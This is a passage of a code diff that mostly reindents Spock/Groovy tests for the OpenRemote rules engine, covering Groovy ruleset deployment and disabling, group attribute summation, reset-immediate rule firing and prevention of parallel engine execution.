-                Constants.MASTER_REALM,
-                "Modulo operator runtime failure",
-                GROOVY,
-                MODULO_RULE))
+    and: "a Groovy ruleset uses the modulo operator in a condition"
+    def ruleset = rulesetStorageService.merge(new RealmRuleset(
+                    Constants.MASTER_REALM,
+                    "Modulo operator runtime failure",
+                    GROOVY,
+                    MODULO_RULE))
 
-        expect: "the ruleset is compiled and deployed before it is evaluated"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.deployments[ruleset.id].status == DEPLOYED
-        }
-
-        when: "the ruleset is evaluated"
-        engine.fireAllDeployments()
-
-        then: "the rule fires without recording a runtime error"
-        def deployment = engine.deployments[ruleset.id]
-        deployment.getError() == null
-        engine.facts.get("Modulo operator") == "fired"
-        engine.isRunning()
+    expect: "the ruleset is compiled and deployed before it is evaluated"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.deployments[ruleset.id].status == DEPLOYED
     }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Groovy rulesets are not compiled or executed when Groovy execution is disabled"() {
-        given: "the container is started with Groovy ruleset execution disabled"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def config = defaultConfig()
-        config[OR_RULES_GROOVY_EXECUTION_ENABLED] = "false"
-        def container = startContainer(config, defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    when: "the ruleset is evaluated"
+    engine.fireAllDeployments()
 
-        and: "a Groovy ruleset which would fail if the manager attempted to compile it"
-        def ruleset = rulesetStorageService.merge(new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Disabled Groovy ruleset",
-                GROOVY,
-                "this is not valid Groovy"))
+    then: "the rule fires without recording a runtime error"
+    def deployment = engine.deployments[ruleset.id]
+    deployment.getError() == null
+    engine.facts.get("Modulo operator") == "fired"
+    engine.isRunning()
+  }
 
-        expect: "the ruleset is tracked but marked disabled instead of compiled"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.deployments[ruleset.id].status == DISABLED
-            assert engine.deployments[ruleset.id].getError() == null
-        }
+  @SuppressWarnings("GroovyAccessibility")
+  def "Groovy rulesets are not compiled or executed when Groovy execution is disabled"() {
+    given: "the container is started with Groovy ruleset execution disabled"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def config = defaultConfig()
+    config[OR_RULES_GROOVY_EXECUTION_ENABLED] = "false"
+    def container = startContainer(config, defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        when: "the rules engine is evaluated"
-        engine.fireAllDeployments()
+    and: "a Groovy ruleset which would fail if the manager attempted to compile it"
+    def ruleset = rulesetStorageService.merge(new RealmRuleset(
+                    Constants.MASTER_REALM,
+                    "Disabled Groovy ruleset",
+                    GROOVY,
+                    "this is not valid Groovy"))
 
-        then: "the Groovy ruleset is still not executed and the engine remains healthy"
-        def deployment = engine.deployments[ruleset.id]
-        deployment.status == DISABLED
-        deployment.getError() == null
-        engine.isRunning()
+    expect: "the ruleset is tracked but marked disabled instead of compiled"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.deployments[ruleset.id].status == DISABLED
+      assert engine.deployments[ruleset.id].getError() == null
     }
+
+    when: "the rules engine is evaluated"
+    engine.fireAllDeployments()
+
+    then: "the Groovy ruleset is still not executed and the engine remains healthy"
+    def deployment = engine.deployments[ruleset.id]
+    deployment.status == DISABLED
+    deployment.getError() == null
+    engine.isRunning()
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/GroupSummationRuleTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/GroupSummationRuleTest.groovy
@@ -39,94 +39,94 @@ import spock.util.concurrent.PollingConditions
 
 class GroupSummationRuleTest extends Specification implements ManagerContainerTrait {
 
-    def "Group summation rule test"() {
+  def "Group summation rule test"() {
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 5, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 5, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        and: "a parent asset and child assets are added"
-        def parentAsset = new ThingAsset("SummationParentAsset")
-                .setId(UniqueIdentifierGenerator.generateId("SummationParentAsset"))
-                .setRealm(Constants.MASTER_REALM)
-                .addAttributes(
-                        new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
-                )
-        parentAsset = assetStorageService.merge(parentAsset)
+    and: "a parent asset and child assets are added"
+    def parentAsset = new ThingAsset("SummationParentAsset")
+            .setId(UniqueIdentifierGenerator.generateId("SummationParentAsset"))
+            .setRealm(Constants.MASTER_REALM)
+            .addAttributes(
+            new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            )
+    parentAsset = assetStorageService.merge(parentAsset)
 
-        def childAsset1 = new ThingAsset("childAsset1")
-                .setId(UniqueIdentifierGenerator.generateId("childAsset1"))
-                .setParent(parentAsset)
-                .addAttributes(
-                        new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
-                )
-        childAsset1 = assetStorageService.merge(childAsset1)
+    def childAsset1 = new ThingAsset("childAsset1")
+            .setId(UniqueIdentifierGenerator.generateId("childAsset1"))
+            .setParent(parentAsset)
+            .addAttributes(
+            new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            )
+    childAsset1 = assetStorageService.merge(childAsset1)
 
-        def childAsset2 = new ThingAsset("childAsset2")
-                .setId(UniqueIdentifierGenerator.generateId("childAsset2"))
-                .setParent(parentAsset)
-                .addAttributes(
-                        new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                        new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
-                )
-        childAsset2 = assetStorageService.merge(childAsset2)
+    def childAsset2 = new ThingAsset("childAsset2")
+            .setId(UniqueIdentifierGenerator.generateId("childAsset2"))
+            .setParent(parentAsset)
+            .addAttributes(
+            new Attribute<>("boolean", ValueType.BOOLEAN, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("integer", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            new Attribute<>("number", ValueType.NUMBER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            )
+    childAsset2 = assetStorageService.merge(childAsset2)
 
-        and: "the group summation ruleset is added"
-        Ruleset ruleset = new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Group summation rule",
-                Ruleset.Lang.GROOVY,
-                getClass().getResource("/org/openremote/test/rules/GroupSummationRule.groovy").text)
-        ruleset = rulesetStorageService.merge(ruleset)
+    and: "the group summation ruleset is added"
+    Ruleset ruleset = new RealmRuleset(
+            Constants.MASTER_REALM,
+            "Group summation rule",
+            Ruleset.Lang.GROOVY,
+            getClass().getResource("/org/openremote/test/rules/GroupSummationRule.groovy").text)
+    ruleset = rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.facts.assetStates.count { it.id == parentAsset.id } == 3
-            assert engine.lastFireTimestamp > ruleset.createdOn.toEpochMilli()
-            assert engine.deployments.get(ruleset.id) != null
-        }
-
-        when: "the integer attribute of the child assets is written to"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "integer", 1))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "integer", 1))
-
-        then: "the corresponding attribute of the parent asset should be updated with the attribute sum of the child assets"
-        conditions.eventually {
-            parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
-            assert parentAsset.getAttribute("integer").flatMap { it.value }.orElse(0) == 2
-        }
-
-        when: "the number attribute of the child assets is written to"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "number", 1.0))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "number", 1.0))
-
-        then: "the corresponding attribute of the parent asset should be updated with the attribute sum of the child assets"
-        conditions.eventually {
-            parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
-            assert parentAsset.getAttribute("number").flatMap { it.value }.orElse(0.0) == 2.0
-        }
-
-        when: "the boolean attribute of the child assets is written to"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "boolean", true))
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "boolean", true))
-
-        then: "the corresponding attribute of the parent asset should not be updated"
-        conditions.eventually {
-            parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
-            assert !parentAsset.getAttribute("boolean").flatMap { it.value }.orElse(false)
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.facts.assetStates.count { it.id == parentAsset.id } == 3
+      assert engine.lastFireTimestamp> ruleset.createdOn.toEpochMilli()
+      assert engine.deployments.get(ruleset.id) != null
     }
+
+    when: "the integer attribute of the child assets is written to"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "integer", 1))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "integer", 1))
+
+    then: "the corresponding attribute of the parent asset should be updated with the attribute sum of the child assets"
+    conditions.eventually {
+      parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
+      assert parentAsset.getAttribute("integer").flatMap { it.value }.orElse(0) == 2
+    }
+
+    when: "the number attribute of the child assets is written to"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "number", 1.0))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "number", 1.0))
+
+    then: "the corresponding attribute of the parent asset should be updated with the attribute sum of the child assets"
+    conditions.eventually {
+      parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
+      assert parentAsset.getAttribute("number").flatMap { it.value }.orElse(0.0) == 2.0
+    }
+
+    when: "the boolean attribute of the child assets is written to"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset1.id, "boolean", true))
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(childAsset2.id, "boolean", true))
+
+    then: "the corresponding attribute of the parent asset should not be updated"
+    conditions.eventually {
+      parentAsset = assetStorageService.find(parentAsset.id, true) as ThingAsset
+      assert !parentAsset.getAttribute("boolean").flatMap { it.value }.orElse(false)
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/RuleResetImmediate.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/RuleResetImmediate.groovy
@@ -48,105 +48,108 @@ import static org.openremote.model.rules.RulesetStatus.DEPLOYED
 
 class RuleResetImmediate extends Specification implements ManagerContainerTrait {
 
-    def "Brightness repeatedly above threshold triggers rule again only with reset immediate"() {
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        def notificationService = container.getService(NotificationService.class)
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        RulesEngine engine = null
-        def sentMessages = new CopyOnWriteArrayList<AbstractNotificationMessage>()
+  def "Brightness repeatedly above threshold triggers rule again only with reset immediate"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def notificationService = container.getService(NotificationService.class)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    RulesEngine engine = null
+    def sentMessages = new CopyOnWriteArrayList<AbstractNotificationMessage>()
 
-        and: "email notifications are captured in-memory"
-        EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
-        mockEmailNotificationHandler.isValid() >> true
-        mockEmailNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                sentMessages << message
-        }
-        mockEmailNotificationHandler.sendMessage(_ as jakarta.mail.Message) >> {
-            message -> NotificationSendResult.success()
-        }
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
-
-        and: "two light assets are added, but only one has the reset immediate meta item"
-        def resetLightAsset = new LightAsset("Reset immediate light")
-                .setId(UniqueIdentifierGenerator.generateId("Reset immediate light"))
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-        resetLightAsset.getAttributes().getOrCreate(LightAsset.BRIGHTNESS)
-                .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
-                .addMeta(new MetaItem<>(MetaItemType.RULE_RESET_IMMEDIATE))
-        resetLightAsset = assetStorageService.merge(resetLightAsset)
-
-        def normalLightAsset = new LightAsset("Normal light")
-                .setId(UniqueIdentifierGenerator.generateId("Normal light"))
-                .setRealm(keycloakTestSetup.realmBuilding.name)
-        normalLightAsset.getAttributes().getOrCreate(LightAsset.BRIGHTNESS)
-                .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
-        normalLightAsset = assetStorageService.merge(normalLightAsset)
-
-        and: "a JSON rule notifies when brightness is above the threshold"
-        def ruleset = new RealmRuleset(
-                keycloakTestSetup.realmBuilding.name,
-                "Brightness reset immediate rule",
-                Ruleset.Lang.JSON,
-                getClass().getResource("/org/openremote/test/rules/JsonRuleResetImmediate.json").text)
-        ruleset = rulesetStorageService.merge(ruleset)
-
-        expect: "the custom asset states and ruleset should be loaded into the rule engine"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
-            assert engine != null
-            assert engine.isRunning()
-            assert engine.deployments.get(ruleset.id)?.status == DEPLOYED
-            assert engine.hasPreviouslyFired()
-            assert engine.facts.assetStates.any { it.id == resetLightAsset.id && it.name == LightAsset.BRIGHTNESS.name }
-            assert engine.facts.assetStates.any { it.id == normalLightAsset.id && it.name == LightAsset.BRIGHTNESS.name }
-        }
-
-        when: "the reset-immediate light enters the matching range"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(resetLightAsset.id, LightAsset.BRIGHTNESS, 100))
-
-        then: "the rule action fires once"
-        conditions.eventually {
-            assert sentMessages.size() == 1
-        }
-
-        when: "the same matching value is received again for the reset-immediate light"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(resetLightAsset.id, LightAsset.BRIGHTNESS, 100))
-
-        then: "the rule action fires again"
-        conditions.eventually {
-            assert sentMessages.size() == 2
-        }
-
-        when: "the normal light enters the matching range"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(normalLightAsset.id, LightAsset.BRIGHTNESS, 100))
-
-        then: "the rule action fires for the first matching event"
-        conditions.eventually {
-            assert sentMessages.size() == 3
-        }
-
-        when: "the same matching value is received again for the normal light"
-        advancePseudoClock(1, TimeUnit.SECONDS, container)
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(normalLightAsset.id, LightAsset.BRIGHTNESS, 100))
-
-        then: "the rule action does not fire again without reset immediate"
-        Thread.sleep(1000)
-        sentMessages.size() == 3
-
-        cleanup:
-        if (notificationService != null && emailNotificationHandler != null) {
-            notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
-        }
+    and: "email notifications are captured in-memory"
+    EmailNotificationHandler mockEmailNotificationHandler = Spy(emailNotificationHandler)
+    mockEmailNotificationHandler.isValid() >> true
+    mockEmailNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      sentMessages << message
     }
+    mockEmailNotificationHandler.sendMessage(_ as jakarta.mail.Message) >> { message ->
+      NotificationSendResult.success()
+    }
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockEmailNotificationHandler)
+
+    and: "two light assets are added, but only one has the reset immediate meta item"
+    def resetLightAsset = new LightAsset("Reset immediate light")
+            .setId(UniqueIdentifierGenerator.generateId("Reset immediate light"))
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+    resetLightAsset.getAttributes().getOrCreate(LightAsset.BRIGHTNESS)
+            .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+            .addMeta(new MetaItem<>(MetaItemType.RULE_RESET_IMMEDIATE))
+    resetLightAsset = assetStorageService.merge(resetLightAsset)
+
+    def normalLightAsset = new LightAsset("Normal light")
+            .setId(UniqueIdentifierGenerator.generateId("Normal light"))
+            .setRealm(keycloakTestSetup.realmBuilding.name)
+    normalLightAsset.getAttributes().getOrCreate(LightAsset.BRIGHTNESS)
+            .addMeta(new MetaItem<>(MetaItemType.RULE_STATE))
+    normalLightAsset = assetStorageService.merge(normalLightAsset)
+
+    and: "a JSON rule notifies when brightness is above the threshold"
+    def ruleset = new RealmRuleset(
+            keycloakTestSetup.realmBuilding.name,
+            "Brightness reset immediate rule",
+            Ruleset.Lang.JSON,
+            getClass().getResource("/org/openremote/test/rules/JsonRuleResetImmediate.json").text)
+    ruleset = rulesetStorageService.merge(ruleset)
+
+    expect: "the custom asset states and ruleset should be loaded into the rule engine"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(keycloakTestSetup.realmBuilding.name)
+      assert engine != null
+      assert engine.isRunning()
+      assert engine.deployments.get(ruleset.id)?.status == DEPLOYED
+      assert engine.hasPreviouslyFired()
+      assert engine.facts.assetStates.any {
+        it.id == resetLightAsset.id && it.name == LightAsset.BRIGHTNESS.name
+      }
+      assert engine.facts.assetStates.any {
+        it.id == normalLightAsset.id && it.name == LightAsset.BRIGHTNESS.name
+      }
+    }
+
+    when: "the reset-immediate light enters the matching range"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(resetLightAsset.id, LightAsset.BRIGHTNESS, 100))
+
+    then: "the rule action fires once"
+    conditions.eventually {
+      assert sentMessages.size() == 1
+    }
+
+    when: "the same matching value is received again for the reset-immediate light"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(resetLightAsset.id, LightAsset.BRIGHTNESS, 100))
+
+    then: "the rule action fires again"
+    conditions.eventually {
+      assert sentMessages.size() == 2
+    }
+
+    when: "the normal light enters the matching range"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(normalLightAsset.id, LightAsset.BRIGHTNESS, 100))
+
+    then: "the rule action fires for the first matching event"
+    conditions.eventually {
+      assert sentMessages.size() == 3
+    }
+
+    when: "the same matching value is received again for the normal light"
+    advancePseudoClock(1, TimeUnit.SECONDS, container)
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(normalLightAsset.id, LightAsset.BRIGHTNESS, 100))
+
+    then: "the rule action does not fire again without reset immediate"
+    Thread.sleep(1000)
+    sentMessages.size() == 3
+
+    cleanup:
+    if (notificationService != null && emailNotificationHandler != null) {
+      notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), emailNotificationHandler)
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/RulesEngineFiringTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/RulesEngineFiringTest.groovy
@@ -46,291 +46,291 @@ import static org.openremote.model.rules.Ruleset.Lang.GROOVY
 
 class RulesEngineFiringTest extends Specification implements ManagerContainerTrait {
 
-    /*
-     * See https://github.com/openremote/openremote/issues/1953
-     * When rules evaluation takes longer than the firing period AND an attribute event occurs during that time,
-     * the rules engine would fire even if rules where still being evaluated.
-     */
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check rules engine are not running in parallel"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+  /*
+   * See https://github.com/openremote/openremote/issues/1953
+   * When rules evaluation takes longer than the firing period AND an attribute event occurs during that time,
+   * the rules engine would fire even if rules where still being evaluated.
+   */
+  @SuppressWarnings("GroovyAccessibility")
+  def "Check rules engine are not running in parallel"() {
+    given: "the container is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine engine = null
 
-        and: "some rulesets with a long running rule"
-        Ruleset ruleset = new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Parallel Engine check rules",
-                GROOVY,
-                getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
-        Long masterRulesetId = rulesetStorageService.merge(ruleset).id
+    and: "some rulesets with a long running rule"
+    Ruleset ruleset = new RealmRuleset(
+            Constants.MASTER_REALM,
+            "Parallel Engine check rules",
+            GROOVY,
+            getClass().getResource("/org/openremote/test/rules/ParallelEngineCheck.groovy").text)
+    Long masterRulesetId = rulesetStorageService.merge(ruleset).id
 
-        and: "assets are added"
-        def counterAsset = new ThingAsset("CounterAsset")
-                .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
-                .setRealm(Constants.MASTER_REALM)
-                .addAttributes(
-                        new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
-                )
-        counterAsset = assetStorageService.merge(counterAsset)
+    and: "assets are added"
+    def counterAsset = new ThingAsset("CounterAsset")
+            .setId(UniqueIdentifierGenerator.generateId("CounterAsset"))
+            .setRealm(Constants.MASTER_REALM)
+            .addAttributes(
+            new Attribute<>("count", ValueType.INTEGER, null).addMeta(new MetaItem<>(MetaItemType.RULE_STATE)),
+            )
+    counterAsset = assetStorageService.merge(counterAsset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-        }
-
-        when: "a mock rules engine is created"
-        // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
-        rulesService.stop(container)
-        RulesEngine mockRulesEngine = Spy(engine)
-        AtomicBoolean rulesExecuting = new AtomicBoolean(false)
-        AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
-        mockRulesEngine.fireAllDeployments() >> {
-            if (rulesExecuting.getAndSet(true)) {
-                parallelExecutionOccurred.set(true)
-            }
-            callRealMethod()
-            rulesExecuting.set(false)
-        }
-        rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
-        rulesService.start(container)
-
-        and: "An attribute has changed value"
-        def receivedEvents = new ArrayList<AttributeEvent>()
-        assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
-            receivedEvents.add(event)
-            false
-        }
-
-        then: "A new attribute event is sent"
-        conditions.eventually {
-            // The exact value does not matter, as the rule when is always true if the attribute exists
-            // it just needs to be long enough for a potential co-execution to happen
-            // and short enough to be reached before the timeout
-            assert receivedEvents.size() == 4
-        }
-        assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
+      assert engine != null
+      assert engine.isRunning()
     }
 
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check schedule fire tolerates concurrent timer clearing"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    when: "a mock rules engine is created"
+    // We want to stop rules evaluation while doing this setup, otherwise our count of attribute event change is biased
+    rulesService.stop(container)
+    RulesEngine mockRulesEngine = Spy(engine)
+    AtomicBoolean rulesExecuting = new AtomicBoolean(false)
+    AtomicBoolean parallelExecutionOccurred = new AtomicBoolean(false)
+    mockRulesEngine.fireAllDeployments() >> {
+      if (rulesExecuting.getAndSet(true)) {
+        parallelExecutionOccurred.set(true)
+      }
+      callRealMethod()
+      rulesExecuting.set(false)
+    }
+    rulesService.realmEngines.put(Constants.MASTER_REALM, mockRulesEngine)
+    rulesService.start(container)
 
-        and: "a simple realm ruleset is deployed"
-        Ruleset ruleset = new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Concurrent timer clearing",
-                GROOVY,
-                getClass().getResource("/org/openremote/test/rules/BasicMatchAllAssetStates.groovy").text)
-        rulesetStorageService.merge(ruleset)
-
-        expect: "the rules engine to become available and running"
-        conditions.eventually {
-            engine = rulesService.realmEngines.get(Constants.MASTER_REALM)
-            assert engine != null
-            assert engine.isRunning()
-        }
-
-        when: "the timer reference is cleared after the running check but before the delay lookup"
-        engine.stop()
-        engine.@running = true
-
-        ScheduledFuture<?> timer = Mock(ScheduledFuture)
-        timer.isDone() >> {
-            engine.@fireTimer = null
-            false
-        }
-        timer.getDelay(TimeUnit.MILLISECONDS) >> 0L
-        engine.@fireTimer = timer
-
-        engine.scheduleFire(true)
-
-        then: "the quick fire check does not dereference a null timer"
-        noExceptionThrown()
-
-        cleanup:
-        stopContainer()
+    and: "An attribute has changed value"
+    def receivedEvents = new ArrayList<AttributeEvent>()
+    assetProcessingService.addEventInterceptor { EntityManager em, AttributeEvent event ->
+      receivedEvents.add(event)
+      false
     }
 
-    /*
-     The exact timing issue is:
-     - fireTimer triggers and is executing the rules (fireAllDeployments)
-     - stop is called, cancelling the fireTimer and setting it to null
-     - start is called, creating a new fireTimer
-     - in this case, that new timer does not fire yet and fireAllDeployments returns,
-       the fire lambda sets fireTimer to null and creates a new timer
-       As a result, two timers are active at the same time
-     */
-    @SuppressWarnings("GroovyAccessibility")
-    def "Check rules engine are not running in parallel on engine restart with new firing after rule execution"() {
-        given: "the container is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine engine = null
+    then: "A new attribute event is sent"
+    conditions.eventually {
+      // The exact value does not matter, as the rule when is always true if the attribute exists
+      // it just needs to be long enough for a potential co-execution to happen
+      // and short enough to be reached before the timeout
+      assert receivedEvents.size() == 4
+    }
+    assert !parallelExecutionOccurred.get(): "Rules engine triggered while rules are still executing"
+  }
 
-        and: "some rulesets with a long running rule"
-        Ruleset ruleset = new RealmRuleset(
-                Constants.MASTER_REALM,
-                "Parallel Engine check rules",
